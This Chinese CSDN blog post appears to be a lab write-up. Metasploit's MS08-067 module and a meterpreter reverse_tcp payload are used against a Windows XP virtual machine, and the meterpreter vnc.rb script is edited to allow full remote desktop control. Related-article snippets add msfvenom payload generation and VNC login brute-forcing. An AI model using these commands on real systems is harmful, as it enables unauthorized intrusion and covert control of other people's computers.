Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面

最新推荐文章于 2024-05-10 08:09:04 发布
最新推荐文章于 2024-05-10 08:09:04 发布
阅读量5.1k 收藏 38
点赞数 5
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46161993/article/details/107072080
版权
问题描述

  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
  由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。

解决办法

在msfconsole中使用命令:

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.161.130
set LHOST 192.168.161.128
set TARGET 34
exploit

得到会话后使用命令run vnc获得靶机桌面。结果如下:
在这里插入图片描述
在这里插入图片描述

如何控制

  由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。
  在目录/usr/share/metasploit-framework/scripts/meterpreter/下找到vnc.rb文件,如下:

在该文件中找到pay的声明位置,在其后添加pay.datastore['ViewOnly'] = false后即可对远程桌面进行控制。

一些关于远程桌面的命令

enumdesktops   #查看可用的桌面
getdesktop   #获取当前 meterpreter 关联的桌面
set_desktop   #设置 meterpreter 关联的桌面 h 查看帮助
screenshot   #截屏
use espia   #或者使用 espia 模块截屏 然后输入 screengrab
run vnc   #使用使用vnc远程桌面连接

参考资料

Meterpreter run vnc 遇到的问题
metasploit 目录结构

D-A-X
关注
  • 5
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
【网络安全】MSF常用的渗透技巧总结
Yb528970805的博客
09-27 1212
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。二、建立一条隧道连接至跳板机,将目标为私有地址的数据发发送至跳板机,目标为私有地址的数据包发送至公网地址会被哦公网路由抛弃,无法访问到目标。在 kaili 中配置隧道要使用的端口,现在版本的 msf 默认是用 socket5 协议,所以在 kali 中也使用 socket5,一、在跳板机上写路由,实现对其他网段的数据包进行转发。
metasploit——(二)漏洞扫描学习篇
weixin_30544657的博客
08-21 338
一、Nessus下载安装   可以参考一下这个详细的连接 https://blog.csdn.net/u012318074/article/details/72354387?locationNum=13&fps=1 二、专用漏洞扫描器 2.1 验证smb登录 use auxiliary/scanner/smb/smb_login 使用SMB登录扫描器对大量主机的用户名和口令进行...
Metasploitable2 - tcp port 5900 - vnc
Nixawk
08-01 1537
msf > use auxiliary/scanner/vnc/vnc_login msf auxiliary(vnc_login) > set RHOSTS 192.168.1.111 RHOSTS => 192.168.1.111 msf auxiliary(vnc_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true m
网络安全: Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux(2)
最新发布
2401_84301227的博客
05-10 556
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:因篇幅有限,仅展示部分资料网络安全面试题绿盟护网行动还有大家最喜欢的黑客技术,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~ip addrHost *ls -l /mntls -l /mntmsfconsolerungetuid。
Meterpreter run vnc 遇到的问题
dianqia8481的博客
12-25 1136
Metasploit框架中的meterpreter无疑是相当强大的工具,而且具有我目前挺喜欢的vnc。但是我在run vnc时发现得到的远程控制桌面是view-only的,通过-h选项发现没有修改的方法,而且使用-c选项根本无法打开courtesy shell!!于是只能自己动手,丰衣足食了。 打开meterpreter下的vnc.rb脚本,发现大量类似这样的语句: 而且使用的p...
菜鸟腾飞MSF
imtech的博客
01-16 782
菜鸟腾飞Metasploit Framework 渗透测试介绍
【漏洞检测】metasploit 使用教程
xnxqwzy的博客
01-04 1238
Metasploitv4之后的新版本中,Meterpreter作为后渗透攻击模块的实施通道,可以根据渗透测试目标需求进行灵活扩展。涉及范围: 信息搜集、口令攫取、权限提升、内网拓展等。攻击载荷(msfpayload)是我们期望目标系统在被渗透攻击后去执行的代码,在metasploit框架中可以自由的选择、传送和植入。....Msf编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序的功能不会受到任何影响。
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
毒蛇:metasploit-framework图形界面图形化内网渗透工具
metateta:使用Metasploit扫描和利用网络协议的Metateta自动化工具
05-09
元数据Metateta自动化工具使用Metasploit扫描和利用网络协议用于大型网络的笔测试更快你可以做什么使用所有metasploit模块扫描特定的网络协议,例如smb,smtp,snmp 针对特定网络协议运行所有辅助模块针对特定的网络...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Kage:Kage是Metasploit Meterpreter和会话处理程序的图形用户界面
02-04
age Kage(ka-geh)是受启发而设计的工具,旨在使Metasploit RPC Server与计量器会话进行交互并生成有效负载。 目前,它仅支持windows/meterpreter和android/meterpreter 。 入门 请按照以下说明操作,以获取在本地计算机上运行的Kage副本,而不会出现任何问题。 先决条件 必须在您的PATH安装 : Msfrpcd 毒液 数据库 正在安装 您可以从安装Kage二进制文件。 对于开发人员 从源代码运行应用程序: # Download source code git clone https://github.com/WayzDe
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3809
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 533
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
作为内网杀手的metasploit如何在外网使用呢?
qq284489030的博客
05-09 5147
经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?…… 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 什么是内网?内网接入方...
蓝凌EKP_sysUiComponent_任意文件上传漏洞(含批量验证poc)
2401_83946070的博客
04-16 327
蓝凌EKP,是蓝凌旗下的协同办公平台,其定位在平台型产品,它是结合蓝凌知识管理及移动互联网理念设计,综合企业管理支撑系统发展而来,并将协同办公、知识共享、文化管理、战略管理等融合为一体,通过企业门户统一战线,满足用户个性化办公要求的一体化工作平台。蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。还有大家最喜欢的黑客技术。
MSF使用1
xhscxj的博客
06-12 3384
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
kali攻防第9章 Metasploit之我的远程控制软件
热门推荐
安全参透之旅
12-07 1万+
准备工具 1、KALI系统 IP 10.10.10.131 2、受害系统 IP 10.10.10.133     步骤: 1、生成木马控制程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=44
kali远程控制手机
02-07
Kali Linux是一款专门用于渗透测试和网络安全的操作系统。远程控制手机是指通过网络连接远程控制手机设备,Kali Linux提供了一些工具和技术来实现这个目的。 一种常见的方法是使用Metasploit框架,它是Kali Linux中一个强大的渗透测试工具Metasploit可以利用已知的漏洞来攻击目标设备,并获取对其的远程访问权限。 以下是一般的步骤: 1. 准备工作:确保你已经安装了Kali Linux,并且手机设备与你的计算机在同一个局域网中。 2. 扫描目标:使用Kali Linux中的工具,如Nmap,对目标手机进行扫描,以获取目标设备的IP地址和开放的端口。 3. 选择漏洞:使用Metasploit框架中的漏洞数据库,选择适合目标设备的漏洞。 4. 配置Payload:创建一个恶意软件载荷(payload),它将被注入到目标设备中,以获取对其的远程访问权限。 5. 发送Payload:使用Metasploit框架中的工具,如msfvenom,将恶意软件载荷发送到目标设备。 6. 建立连接:一旦目标设备执行了恶意软件载荷,你将能够建立与目标设备的远程连接。 需要注意的是,远程控制手机是一种潜在的非法行为,未经授权地访问他人设备是违法的。在进行任何安全测试活动之前,请确保你已经获得了合法的授权,并遵守当地法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

D-A-X

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值